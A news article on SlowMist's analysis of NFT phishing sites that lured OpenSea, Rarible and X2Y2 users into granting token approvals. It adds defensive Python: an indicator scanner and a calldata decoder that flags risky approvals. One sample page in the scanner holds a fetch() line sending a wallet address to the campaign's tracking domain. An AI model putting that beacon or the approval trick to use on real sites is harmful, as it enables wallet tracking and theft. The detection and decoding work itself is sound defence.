SlowMist exposes hundreds of NFT phishing websites, targeting users of platforms like OpenSea

SlowMist mentioned several characteristics of hacker attacks in their analysis report. Phishing website attacks have been ongoing for several months, with hackers successfully obtaining about 300 ETH. Additionally, it appears that hackers from North Korea and Eastern Europe are collaborating to scam NFT users.

Following an article SlowMist published in September, and the 196 NFT phishing websites linked to North Korean hackers that were exposed by Twitter user PhantomXSec, SlowMist has now released an analysis report on the incident.

SlowMist's investigation found that the attack, attributed to a North Korean Advanced Persistent Threat (APT) group, has been ongoing for several months; the earliest phishing website was registered seven months ago.

The phishing campaign targeted users of NFT platforms such as OpenSea, Rarible and X2Y2. Victims were first lured with what appeared to be legitimate NFTs, then redirected to phishing websites to "mint", where they were tricked into granting the website approval over the NFTs or ERC-20 tokens in their wallets.

SlowMist identified several characteristics shared by the phishing websites, including the following code in the pages themselves or in their authorization requests:

  1. Recording visitor data: "mmAddr" stores the visitor's wallet address and "accessTime" stores the time of the visit.

  2. Requesting price data from an endpoint named "getPriceData.php".

  3. Linking images to specific NFT projects through a script file named "imgSrc.js".

  4. A domain used to monitor user requests and record user data: "thedoodles.site".
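The four markers above are concrete strings that a defender can look for in fetched page sources or proxy logs. The following scanner is an added example, not SlowMist's tooling: it takes the indicator strings exactly as listed in the report, wraps them in regular expressions of this example's own construction, and scores each page by how many campaign-specific markers it contains. The sample page bodies and their ".invalid" URLs are constructed for the demonstration, not captured from any real site.

```python
import re
from dataclasses import dataclass, field

# Indicator strings come from the SlowMist characteristics listed above;
# the regexes and the scoring built around them are this example's own.
INDICATORS = {
    "visitor_recording": re.compile(r"\b(?:mmAddr|accessTime)\b"),
    "price_endpoint": re.compile(r"getPriceData\.php", re.IGNORECASE),
    "image_mapping_script": re.compile(r"imgSrc\.js", re.IGNORECASE),
    "tracking_domain": re.compile(r"thedoodles\.site", re.IGNORECASE),
}


@dataclass
class ScanResult:
    url: str
    hits: list = field(default_factory=list)

    @property
    def verdict(self) -> str:
        # One generic-looking name (e.g. accessTime) could be coincidence;
        # the tracking domain alone, or two or more markers together, is
        # treated as the phishing kit described in the report.
        if "tracking_domain" in self.hits or len(self.hits) >= 2:
            return "phishing"
        return "suspicious" if self.hits else "clean"


def scan_page(url: str, body: str) -> ScanResult:
    """Return which campaign indicators appear in a fetched page body (HTML or JS)."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(body)]
    return ScanResult(url, hits)


def scan_pages(pages: dict) -> dict:
    """Map each URL to its verdict; input is {url: page_text}."""
    return {url: scan_page(url, body).verdict for url, body in pages.items()}


# Constructed sample page bodies (placeholder .invalid hosts, not real sites).
SAMPLE_PAGES = {
    "https://mint-example.invalid/": """
        <script src="imgSrc.js"></script>
        <script>
          const mmAddr = accounts[0];
          fetch('https://thedoodles.site/log?addr=' + mmAddr + '&accessTime=' + Date.now());
        </script>""",
    "https://gallery-example.invalid/": """
        <script>fetch('/api/getPriceData.php').then(r => r.json());</script>""",
    "https://blog-example.invalid/": "<p>Nothing to see here.</p>",
}

if __name__ == "__main__":
    for url, verdict in scan_pages(SAMPLE_PAGES).items():
        print(f"{verdict:10} {url}")
```

Run against crawled or proxied page bodies, the function returns "phishing" for the first sample (three markers, including the tracking domain), "suspicious" for the second (only the price endpoint, which is a generic enough name to warrant a look rather than a block), and "clean" for the third. Because the indicators are campaign-specific strings, expect the kit to change them; the structure (address capture, timing, image-to-project mapping, exfiltration host) is the durable part of the signature.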

SlowMist also pointed out that even when the phishing website's domain is not "opensea.io", the wallet's authorization prompt can still display the correct URL, which makes the request appear legitimate.
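The mechanism described above (luring the victim into approving the site over their NFTs or ERC-20 tokens) and the caveat that the displayed domain cannot be trusted both point to the same defensive check: inspect what the transaction actually grants, not where it came from. The following decoder is an added example, not code from SlowMist or any wallet; it parses the two standard approval calls, setApprovalForAll(address,bool) and approve(address,uint256), from raw calldata using their well-known 4-byte selectors, and flags approvals to operators outside an allowlist. The contract and operator addresses are constructed placeholders, and the allowlist of "trusted" operators is an assumption of the example.

```python
from dataclasses import dataclass
from typing import Optional

# 4-byte function selectors (first 4 bytes of keccak256 of the signature);
# these are the standard ERC-20 / ERC-721 / ERC-1155 approval entry points.
SEL_SET_APPROVAL_FOR_ALL = "a22cb465"  # setApprovalForAll(address,bool)
SEL_APPROVE = "095ea7b3"               # approve(address,uint256)
MAX_UINT256 = 2**256 - 1


@dataclass
class Approval:
    kind: str        # "setApprovalForAll" or "approve"
    token: str       # contract the transaction is sent to
    spender: str     # operator / spender being granted rights
    unlimited: bool  # whole collection, or uint256-max allowance


def _word(body: str, index: int) -> str:
    """Return the index-th 32-byte ABI word of the calldata body as hex."""
    return body[64 * index: 64 * (index + 1)]


def decode_approval(to: str, data: str) -> Optional[Approval]:
    """Decode an approval call from raw calldata; None if it is something else."""
    data = data.lower()
    if data.startswith("0x"):
        data = data[2:]
    selector, body = data[:8], data[8:]
    if len(body) < 128:              # both calls take two 32-byte arguments
        return None
    spender = "0x" + _word(body, 0)[24:]   # address is right-aligned in its word
    if selector == SEL_SET_APPROVAL_FOR_ALL:
        approved = int(_word(body, 1), 16) != 0
        return Approval("setApprovalForAll", to.lower(), spender, approved)
    if selector == SEL_APPROVE:
        amount = int(_word(body, 1), 16)
        return Approval("approve", to.lower(), spender, amount == MAX_UINT256)
    return None


def assess(to: str, data: str, trusted_operators: set) -> str:
    """'allow', 'review' or 'reject', decided from the calldata alone.

    The page that produced the request, and the domain the wallet shows,
    play no part here: per the article, that display can look legitimate.
    """
    appr = decode_approval(to, data)
    if appr is None:
        return "allow"       # not an approval; outside this check's scope
    if appr.spender not in trusted_operators:
        return "reject"      # rights granted to an operator we do not know
    return "review" if appr.unlimited else "allow"


def encode_set_approval_for_all(operator: str, approved: bool) -> str:
    """Build setApprovalForAll calldata; used only to construct the samples."""
    addr = operator.lower().replace("0x", "").rjust(64, "0")
    flag = ("1" if approved else "0").rjust(64, "0")
    return "0x" + SEL_SET_APPROVAL_FOR_ALL + addr + flag


def encode_approve(spender: str, amount: int) -> str:
    """Build approve(address,uint256) calldata; used only to construct the samples."""
    addr = spender.lower().replace("0x", "").rjust(64, "0")
    return "0x" + SEL_APPROVE + addr + format(amount, "064x")


# Constructed placeholder addresses (not real contracts or wallets).
MARKETPLACE_CONDUIT = "0x" + "11" * 20   # assumed legitimate marketplace operator
PHISHING_OPERATOR = "0x" + "ab" * 20     # assumed attacker-controlled address
NFT_CONTRACT = "0x" + "cc" * 20
TRUSTED = {MARKETPLACE_CONDUIT}

if __name__ == "__main__":
    calls = [
        ("legit listing", encode_set_approval_for_all(MARKETPLACE_CONDUIT, True)),
        ("phishing mint", encode_set_approval_for_all(PHISHING_OPERATOR, True)),
        ("token drain", encode_approve(PHISHING_OPERATOR, MAX_UINT256)),
    ]
    for label, data in calls:
        print(f"{label:14} -> {assess(NFT_CONTRACT, data, TRUSTED)}")
```

A "mint" page has no reason to ask for setApprovalForAll over an existing collection or for an unlimited ERC-20 allowance, so any such request arriving from an unknown operator is rejected outright; a blanket approval to a known marketplace operator is returned as "review" because it is still the grant that a later compromise would abuse, and revoking it after the listing is a reasonable habit.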

SlowMist estimates that the hackers obtained at least 1,055 NFTs, which were sold for approximately 300 ETH in profit. Furthermore, during the tracking process it was discovered that North Korean and Eastern European hackers appear to be collaborating to defraud NFT users.